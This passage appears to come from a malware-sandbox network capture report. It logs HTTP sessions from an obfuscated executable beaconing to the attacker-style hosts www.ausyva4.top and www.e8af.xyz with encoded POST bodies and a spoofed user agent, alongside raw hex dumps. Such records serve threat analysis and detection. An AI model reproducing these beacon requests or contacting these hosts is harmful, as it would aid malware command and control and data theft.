65 3e 48 69 65 72 20 65 6e 74 73 74 65 68 74 20 65 69 6e 65 20 6e 65 75 65 20 57 65 62 73 69 74 65 21 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e [TRUNCATED]
                                                            Data Ascii: 970<!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml" lang="de" xml:lang="de"><head> <link rel="stylesheet" href="http://www.graviton.energy/css/app.css"> <script type="text/javascript" src="http://www.graviton.energy/js/app.js"></script> <title>Hier entsteht eine neue Website!</title> <meta charset="utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge" /> <meta name="robots" content="noindex"> <meta name="viewport" content="width=device-width, initial-scale=1" /> <link rel="stylesheet" href="https://use.typekit.net/bag0psx.css" /> <meta name="csrf-token" content=""> <link rel="prefetch" as="image" href="http://www.graviton.energy/../images/bg-landing-page.jpg" /> <link rel="apple-touch-icon" sizes="180x180" href="http://www.graviton.energy/images/favicons/apple-touch-icon.png"> <link rel="icon" type="image/png" sizes="32x32" href="http://www.graviton.energy/images/favicons/favicon-32x32.png"> <link rel="icon" type="image/png" [TRUNCATED]
                                                            Jan 11, 2025 05:45:07.352071047 CET1236INData Raw: 67 72 61 76 69 74 6f 6e 2e 65 6e 65 72 67 79 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 31 36 78 31 36 2e 70 6e 67 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 61 6e 69 66 65 73 74 22 20 68 72 65 66 3d
                                                            Data Ascii: graviton.energy/images/favicons/favicon-16x16.png"> <link rel="manifest" href="http://www.graviton.energy/images/favicons/manifest.json"> <link rel="mask-icon" href="http://www.graviton.energy/images/favicons/safari-pinned-tab.svg" col
                                                            Jan 11, 2025 05:45:07.352086067 CET148INData Raw: 2d 73 6d 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 70 79 72 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 c2 a9 20 43 6f 70 79 72 69 67 68 74 20 32 30 32 35 2c 20 68 6f 73 74 74 65 63 68 20 47 6d 62 48
                                                            Data Ascii: -sm"> <div class="copyright"> Copyright 2025, hosttech GmbH </div> </div></footer></div></body></html>0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            25192.168.2.1050006104.21.48.233806336C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jan 11, 2025 05:45:12.402044058 CET798OUTPOST /p9tq/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.ausyva4.top
                                                            Origin: http://www.ausyva4.top
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Connection: close
                                                            Content-Length: 194
                                                            Cache-Control: no-cache
                                                            Referer: http://www.ausyva4.top/p9tq/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                            Data Raw: 72 46 62 64 79 3d 37 6b 45 58 52 31 42 4a 39 34 2f 34 68 77 4f 58 41 55 61 6e 7a 6b 4c 4d 2b 70 57 37 39 41 7a 45 2f 76 78 45 58 41 63 33 76 78 68 6f 2b 4a 45 6c 54 78 4b 31 34 54 64 38 53 61 71 54 54 4e 43 43 35 35 5a 72 44 66 50 72 58 37 6b 76 64 75 4e 2f 57 39 4b 41 46 4c 4e 6d 63 77 68 46 48 68 2f 69 32 61 7a 6a 2b 7a 72 41 63 46 65 55 42 33 6a 57 67 6d 79 55 4f 75 61 51 64 37 63 62 34 52 71 58 45 57 4a 75 45 6a 6d 47 34 54 6c 69 33 37 56 65 4a 6f 7a 38 68 32 58 4b 56 63 61 53 75 34 47 49 70 4b 4f 77 79 33 2b 74 7a 71 32 59 4c 52 38 33 51 76 48 4c 66 4a 57 54 65 71 5a 5a
                                                            Data Ascii: rFbdy=7kEXR1BJ94/4hwOXAUanzkLM+pW79AzE/vxEXAc3vxho+JElTxK14Td8SaqTTNCC55ZrDfPrX7kvduN/W9KAFLNmcwhFHh/i2azj+zrAcFeUB3jWgmyUOuaQd7cb4RqXEWJuEjmG4Tli37VeJoz8h2XKVcaSu4GIpKOwy3+tzq2YLR83QvHLfJWTeqZZ
                                                            Jan 11, 2025 05:45:13.010396004 CET1156INHTTP/1.1 404 Not Found
                                                            Date: Sat, 11 Jan 2025 04:45:12 GMT
                                                            Content-Type: text/html
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=07l7O1Z%2BsYyq6aQ1OFewzfj5DVpqiKtNwxrcxRHCa2ecqHy56MzZ7QbPTmwHmI3F2zjuDNKSx21STyNGZMumQ3bOgUL8PFNLtregVyTY508Bf%2BGgo39psVDvncNE2H2puQI%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 9002418afdc4421b-EWR
                                                            Content-Encoding: gzip
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1685&min_rtt=1685&rtt_var=842&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=798&delivery_rate=0&cwnd=185&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 31 36 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 91 41 6f c2 30 0c 85 ef 48 fc 07 6f 77 30 ad d8 61 28 ca 61 c0 b4 49 8c a1 ad 48 db 31 10 43 a2 95 b8 4b 5d aa fe fb 89 42 27 34 69 97 bc 38 f6 f7 e4 e8 a9 9b d9 eb 34 fb 5c cd e1 29 7b 59 c0 6a fd b0 78 9e c2 ed 00 f1 79 9e 3d 22 ce b2 d9 b9 93 0e 47 88 f3 e5 ad ee f7 94 93 43 de 2a 19 ab 95 78 c9 49 8f 47 63 58 b2 c0 23 57 c1 2a 3c 3f 2a 6c 47 fa 3d b5 61 db 9c 74 4b 41 28 6a e5 92 bf 84 4b b4 c2 4b bb df 83 77 8e b1 81 1d 47 10 47 e0 c3 96 c3 91 82 a7 b0 a5 a1 da 44 d4 fd de 2a 27 53 12 44 2a 38 0a 88 f3 25 1c a8 2c cd 9e c0 04 7b 62 f2 ca 52 cb ef 38 cf b9 f6 61 0f 3e ec 38 1e 8c 78 0e 20 0c 55 d9 b9 65 ce 84 2f 68 b8 82 23 c5 06 0e d5 d6 dd 28 2c 4e 4b 8b d9 e4 d4 5e 62 7b 5a bd 7e 5b 4c 14 8a bd 94 4e a4 98 20 d6 75 3d 34 55 d9 1c cd 78 28 5c 60 71 2f df d8 8d e1 05 ee 2c de 29 1e 29 5e bb e4 15 5b df d0 c0 d4 e5 20 b0 a5 e4 3f 74 66 84 ae c1 74 94 de e1 28 c1 24 81 24 9d 8c ef 26 49 fa 07 c5 df 2f b8 88 7a c5 35 45 b2 b0 69 e0 43 b9 a8 bb 54 84 [TRUNCATED]
                                                            Data Ascii: 162uAo0How0a(aIH1CK]B'4i84\){Yjxy="GC*xIGcX#W*<?*lG=atKA(jKKwGGD*'SD*8%,{bR8a>8x Ue/h#(,NK^b{Z~[LN u=4Ux(\`q/,))^[ ?tft($$&I/z5EiCTAa^B,10


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            26192.168.2.1050007104.21.48.233806336C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jan 11, 2025 05:45:14.956047058 CET822OUTPOST /p9tq/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.ausyva4.top
                                                            Origin: http://www.ausyva4.top
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Connection: close
                                                            Content-Length: 218
                                                            Cache-Control: no-cache
                                                            Referer: http://www.ausyva4.top/p9tq/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                            Data Raw: 72 46 62 64 79 3d 37 6b 45 58 52 31 42 4a 39 34 2f 34 67 52 65 58 43 31 61 6e 69 55 4c 50 36 5a 57 37 33 67 7a 41 2f 76 39 45 58 42 59 42 75 44 56 6f 2f 74 49 6c 4a 31 65 31 39 54 64 38 5a 36 71 57 64 74 43 5a 35 35 45 55 44 64 62 72 58 37 77 76 64 76 39 2f 57 4d 4b 48 58 72 4e 67 54 51 67 6a 44 68 2f 69 32 61 7a 6a 2b 7a 76 35 63 45 32 55 42 44 66 57 68 43 75 62 51 2b 61 58 61 37 63 62 38 52 71 62 45 57 4a 63 45 69 37 4f 34 56 68 69 33 37 6c 65 4a 35 7a 37 32 6d 58 4d 52 63 62 65 2f 35 37 43 74 72 71 51 2b 57 58 35 73 62 57 34 42 51 42 77 42 2b 6d 63 4d 2b 4b 64 51 73 73 7a 72 4d 61 42 31 57 69 71 75 73 44 6a 6a 36 55 41 4f 2f 50 70 76 41 3d 3d
                                                            Data Ascii: rFbdy=7kEXR1BJ94/4gReXC1aniULP6ZW73gzA/v9EXBYBuDVo/tIlJ1e19Td8Z6qWdtCZ55EUDdbrX7wvdv9/WMKHXrNgTQgjDh/i2azj+zv5cE2UBDfWhCubQ+aXa7cb8RqbEWJcEi7O4Vhi37leJ5z72mXMRcbe/57CtrqQ+WX5sbW4BQBwB+mcM+KdQsszrMaB1WiqusDjj6UAO/PpvA==
                                                            Jan 11, 2025 05:45:15.557960987 CET814INHTTP/1.1 404 Not Found
                                                            Date: Sat, 11 Jan 2025 04:45:15 GMT
                                                            Content-Type: text/html
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZLJG4ERKv2orYNq5xmGT9P4mGenCh8B0x3gLA1w2CzWGSpYauqq1ahAeFym4JgdKwdxZRh3Brf%2FIGXLxP8tVC6tK1LZ8hVM6yBM19mdzsNMIT%2BxTMu3YK5qJ9C5kLyS%2BB%2B0%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 9002419b0fbd4308-EWR
                                                            Content-Encoding: gzip
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1869&min_rtt=1869&rtt_var=934&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=822&delivery_rate=0&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a
                                                            Data Ascii: f
                                                            Jan 11, 2025 05:45:15.558871031 CET355INData Raw: 31 35 37 0d 0a 75 91 41 6b 02 31 10 85 ef 82 ff 61 ec 5d c7 15 3d 54 42 0e 55 4b 0b d6 4a bb 42 7b 8c 66 34 a1 6b 66 9b 9d 75 d9 7f 5f 5c dd 22 85 5e f2 32 99 f9 1e 13 9e ea cd 5f 67 e9 e7 7a 01 4f e9 cb 12 d6 9b 87 e5 f3 0c ee fa 88 cf 8b f4 11
                                                            Data Ascii: 157uAk1a]=TBUKJB{f4kfu_\"^2_gzOq/`XnG99fZx8<rfQ[YwV.KD+xksq>8(x;mD32A8_Lg&+-5+P[LK8QX\Oa~^Z6rP


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            27192.168.2.1050008104.21.48.233806336C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jan 11, 2025 05:45:17.516024113 CET1835OUTPOST /p9tq/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.ausyva4.top
                                                            Origin: http://www.ausyva4.top
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Connection: close
                                                            Content-Length: 1230
                                                            Cache-Control: no-cache
                                                            Referer: http://www.ausyva4.top/p9tq/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                            Data Raw: 72 46 62 64 79 3d 37 6b 45 58 52 31 42 4a 39 34 2f 34 67 52 65 58 43 31 61 6e 69 55 4c 50 36 5a 57 37 33 67 7a 41 2f 76 39 45 58 42 59 42 75 44 74 6f 2b 65 41 6c 54 53 79 31 36 54 64 38 61 36 71 58 64 74 43 55 35 35 4d 59 44 64 48 52 58 34 49 76 63 4a 4a 2f 51 2b 79 48 4f 62 4e 67 57 67 67 33 48 68 2f 4e 32 61 69 6f 2b 7a 2f 35 63 45 32 55 42 43 50 57 6f 32 79 62 53 2b 61 51 64 37 63 58 34 52 72 45 45 53 6c 6d 45 69 76 65 35 6c 42 69 30 66 4a 65 46 72 62 37 70 57 58 4f 63 38 61 44 2f 35 33 42 74 72 32 63 2b 57 53 78 73 63 36 34 41 68 77 33 63 38 36 56 66 75 58 43 58 2b 6b 4e 73 70 79 35 39 47 66 61 71 66 66 44 6d 35 49 53 50 74 61 79 7a 56 41 45 67 78 57 48 69 54 54 58 62 68 53 73 54 34 45 46 31 48 5a 34 36 76 73 7a 57 2f 32 77 72 55 6e 37 74 46 4a 2f 43 36 57 53 56 30 76 57 78 54 6e 6b 50 72 46 66 73 75 45 4d 4a 4d 38 7a 45 4c 2f 67 50 68 57 6d 54 42 73 30 56 33 4f 69 71 74 4f 7a 6a 77 67 46 45 48 67 57 4b 6e 5a 43 33 62 6e 79 50 6d 53 4f 51 56 63 4f 58 74 68 51 52 78 59 59 45 35 65 49 57 2f 42 44 [TRUNCATED]
                                                            Data Ascii: rFbdy=7kEXR1BJ94/4gReXC1aniULP6ZW73gzA/v9EXBYBuDto+eAlTSy16Td8a6qXdtCU55MYDdHRX4IvcJJ/Q+yHObNgWgg3Hh/N2aio+z/5cE2UBCPWo2ybS+aQd7cX4RrEESlmEive5lBi0fJeFrb7pWXOc8aD/53Btr2c+WSxsc64Ahw3c86VfuXCX+kNspy59GfaqffDm5ISPtayzVAEgxWHiTTXbhSsT4EF1HZ46vszW/2wrUn7tFJ/C6WSV0vWxTnkPrFfsuEMJM8zEL/gPhWmTBs0V3OiqtOzjwgFEHgWKnZC3bnyPmSOQVcOXthQRxYYE5eIW/BD1BpmtTyqmkJ8DHksX+MB/IrzA3rHP48rpCdTw1oATvKYZbG/48JcaFuMkVUm+CDoaWDdbdF7twxG70Fcho/6tD90xNrbDdehiweg3wOe18KOlilUR8HBrVcvj8tF21vrdcOgu1XNMGbY+jADipNvxD33Fra3LDBkB8/5PTLbX8uKzENaQz7TP9ogwmCdOQwnoXLtuGqcSsVYSUUH9sMtYgqrh2SY5uLYRNRMBmV8Jc5Z1+IBz+/1LtwZtFb3YwQNiDpBD3neuFyqmjLnarHaQeHfjRDGxYxbrjvdrKgFxJXTNS6xUQuyksZF8hd3V6vk+MHjCENH1SEZ9ccCCBdMgo7E/ah1Cw/x6EUxKRO9wmI091K8DtLZ4Yhz3jp52bREEeag2L4Pey97KJzaZSt1TQfrQlDlZ59OYp5zrxfPJDG/039Oq3vxMJ6IxHq03icqt4uKr2witCmBd/rPThdYVnt2ipXp+1A7hUw1OioLXz4EBoxH7+yzAPA08IVzW/QnxU3kD6lWqhGI0LUToVmucmnOtVp5mSbzcFgbc8DjhgdcfHjM7nXyYRUBOe4kHEShHAAf4c7l1I9wctMkT/c38hbZHPgqfWfpQwUlSm8n0wjmsmnPsFzrrrPB8cuCdXa54HQ+eXoRVXOqpyTzwIORo0ANzoSY16Wpkp [TRUNCATED]
                                                            Jan 11, 2025 05:45:18.138160944 CET1157INHTTP/1.1 404 Not Found
                                                            Date: Sat, 11 Jan 2025 04:45:18 GMT
                                                            Content-Type: text/html
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t99bqS8oMzQ9S83d9eLzkG12Tr0QFTSXlA5PF7jQINtEOtCEVByqjLQf%2BHoN5tNgJf6BUNWHA7CUFukKZneYl3SS5nkdlAlwRSZ9MsO1ljiRXKpDu2jBtCFGHMNiHi%2F3rUU%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 900241aaec927cb2-EWR
                                                            Content-Encoding: gzip
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1972&min_rtt=1972&rtt_var=986&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1835&delivery_rate=0&cwnd=214&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 31 36 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 91 41 6b 02 31 10 85 ef 82 ff 61 ea 5d c7 15 0b ad 84 1c 5a 2d 15 6c 2b 75 0b ed 31 9a d1 84 ae 99 6d 76 d6 65 ff 7d 71 75 8b 08 bd e4 65 32 f3 3d 26 3c 75 33 7d 7b 4c bf 96 33 78 4e 5f 16 b0 fc 78 58 cc 1f a1 d7 47 9c cf d2 27 c4 69 3a 3d 75 46 83 21 e2 ec b5 a7 bb 1d e5 64 9f 35 4a c6 6a 25 5e 32 d2 e3 e1 18 5e 59 e0 89 cb 60 15 9e 1e 15 36 23 dd 8e 5a b3 ad 8f ba a1 20 14 b5 72 c9 35 e1 12 ad f0 dc ee 76 60 c5 31 d6 b0 e5 08 e2 08 7c d8 70 38 50 f0 14 36 34 50 eb 88 ba db 59 66 64 0a 82 48 39 47 01 71 be 80 3d 15 85 d9 11 98 60 8f 4c 56 5a 6a f8 2d 67 19 57 3e ec c0 87 2d c7 bd 11 cf 01 84 a1 2c 5a b7 d4 99 f0 0d 35 97 70 a0 58 c3 be dc b8 1b 85 f9 71 69 31 eb 8c 9a 4b 6c 4e ab 3f de 17 13 85 62 cf a5 13 c9 27 88 55 55 0d 4c 59 d4 07 33 1e 08 e7 98 df cb 0f b6 63 78 86 5b 8b 15 c5 03 c5 4b 97 ac 64 eb 6b ea 9b aa e8 07 b6 94 fc 87 4e 8d d0 25 38 1a 8e 6e 71 98 60 92 40 32 9a 8c 6f 27 c9 dd 15 8a 7f 5f 70 11 f5 92 2b 8a 64 61 5d c3 a7 72 51 b7 a9 08 [TRUNCATED]
                                                            Data Ascii: 162uAk1a]Z-l+u1mve}que2=&<u3}{L3xN_xXG'i:=uF!d5Jj%^2^Y`6#Z r5v`1|p8P64PYfdH9Gq=`LVZj-gW>-,Z5pXqi1KlN?b'UULY3cx[KdkN%8nq`@2o'_p+da]rQt68<10


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            28192.168.2.1050009104.21.48.233806336C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jan 11, 2025 05:45:20.058527946 CET540OUTGET /p9tq/?UPxHl=S80HqRlhn&rFbdy=2ms3SAJ3/Y72jDOYcVaNzEXGx76Mph7m+YVIXk8EkhJXwsY9KxDO5xtAZPzCU4fVpNNcB8PkealyXuVaLMOCDp5jVhhqAxzh3q6rpxv8ZEWBJyfI2w== HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Host: www.ausyva4.top
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                            Jan 11, 2025 05:45:20.653219938 CET770INHTTP/1.1 404 Not Found
                                                            Date: Sat, 11 Jan 2025 04:45:20 GMT
                                                            Content-Type: text/html
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bYVp%2FBFZg2upHdZZbJSjQG8TgOQYgE3IPO1nBVakurEWbUDSKajLi7XVa5Wqts4D8iH%2Fg9BcX%2FGoKeTVY806iokxUo%2FmooNkb37U7IrqsFE2Z5DmM2tf2Cqzmq4FlRlyFRY%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 900241bada3d4381-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1708&min_rtt=1708&rtt_var=854&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=540&delivery_rate=0&cwnd=209&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Jan 11, 2025 05:45:20.654582977 CET716INData Raw: 32 63 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20
                                                            Data Ascii: 2c0<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center> Sorry for the inconvenience.<br/>Please report this message and include the followi


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            29192.168.2.10500103.252.97.86806336C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jan 11, 2025 05:45:25.710680962 CET789OUTPOST /hhdc/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.e8af.xyz
                                                            Origin: http://www.e8af.xyz
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Connection: close
                                                            Content-Length: 194
                                                            Cache-Control: no-cache
                                                            Referer: http://www.e8af.xyz/hhdc/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                            Data Raw: 72 46 62 64 79 3d 72 6e 48 53 50 55 6f 6e 79 30 37 59 73 64 7a 4c 68 33 55 6d 71 55 6b 5a 41 41 34 50 6b 73 6e 4e 63 56 7a 59 2f 65 2f 59 4f 58 36 4f 6b 67 31 76 46 5a 2b 4a 65 78 79 58 35 45 6e 75 76 78 51 47 61 62 49 38 76 69 37 73 4f 30 45 7a 2b 44 38 70 4f 4b 72 34 5a 78 36 51 55 2f 44 79 63 61 72 31 4f 61 69 66 5a 5a 49 34 47 38 45 67 6d 67 51 2f 74 33 6f 49 33 69 4b 56 55 4f 77 38 66 2b 67 78 6b 71 74 6d 78 6d 65 2b 2b 48 75 63 2b 4d 64 55 55 48 5a 66 6f 64 38 77 52 57 36 61 45 67 74 41 37 59 33 4c 56 49 2b 4b 6e 31 51 68 44 73 53 41 34 52 2b 48 57 65 44 76 66 46 6b 46
                                                            Data Ascii: rFbdy=rnHSPUony07YsdzLh3UmqUkZAA4PksnNcVzY/e/YOX6Okg1vFZ+JexyX5EnuvxQGabI8vi7sO0Ez+D8pOKr4Zx6QU/Dycar1OaifZZI4G8EgmgQ/t3oI3iKVUOw8f+gxkqtmxme++Huc+MdUUHZfod8wRW6aEgtA7Y3LVI+Kn1QhDsSA4R+HWeDvfFkF
                                                            Jan 11, 2025 05:45:26.366406918 CET1236INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Sat, 11 Jan 2025 04:45:26 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            X-Trace: 2BB6D4FF7B1BE172E068A73EB96D74D7700BEE5DF204EC677DD43B7AC000
                                                            Set-Cookie: _csrf=51cc0992ea1d7f7564af0ff2474a74decfe4864b45730fe918c859a9331e91f8a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22ot6xu2IKvk7J3KjRQi7HEvEgIdu79Hhi%22%3B%7D; path=/; HttpOnly
                                                            Data Raw: 33 31 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 70 61 72 61 6d 22 20 63 6f 6e 74 65 6e 74 3d 22 5f 63 73 72 66 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 74 6f 6b 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 64 76 4e 68 69 6b 75 62 37 6a 66 64 37 64 5a 71 55 50 30 38 72 63 45 64 4b 36 30 6f 47 70 6e 47 4a 71 6b 69 37 43 54 51 5f 6d 49 5a 68 31 66 79 50 71 6d 6e 66 4b 75 47 34 53 42 6a 74 6c 62 5f 6b 48 51 63 35 57 31 73 33 4b 46 76 7a 56 66 62 48 5a 69 57 43 77 3d 3d 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f [TRUNCATED]
                                                            Data Ascii: 31b<!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="csrf-param" content="_csrf"> <meta name="csrf-token" content="dvNhikub7jfd7dZqUP08rcEdK60oGpnGJqki7CTQ_mIZh1fyPqmnfKuG4SBjtlb_kHQc5W1s3KFvzVfbHZiWCw=="> <title>Not Found (#404)</title> <link href="/css/site.css" rel="stylesheet"></head><body><div class="wrap"> <div class="site-error"> <h1>Not Found (#404)</h1> <div class="alert alert-danger"> Page not found. </div> <p> The above error occurred while the Web server was processing your request. </p> <p> Please contact us if you think this is a server error. Thank you. </p></div></di
                                                            Jan 11, 2025 05:45:26.366444111 CET27INData Raw: 76 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: v></body></html>0


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            30192.168.2.10500113.252.97.8680
                                                            TimestampBytes transferredDirectionData
                                                            Jan 11, 2025 05:45:28.833187103 CET813OUTPOST /hhdc/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.e8af.xyz
                                                            Origin: http://www.e8af.xyz
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Connection: close
                                                            Content-Length: 218
                                                            Cache-Control: no-cache
